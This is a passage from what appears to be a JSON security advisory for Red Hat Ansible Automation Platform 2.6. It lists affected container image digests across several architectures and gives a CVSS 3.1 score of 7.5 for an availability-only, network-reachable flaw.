"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
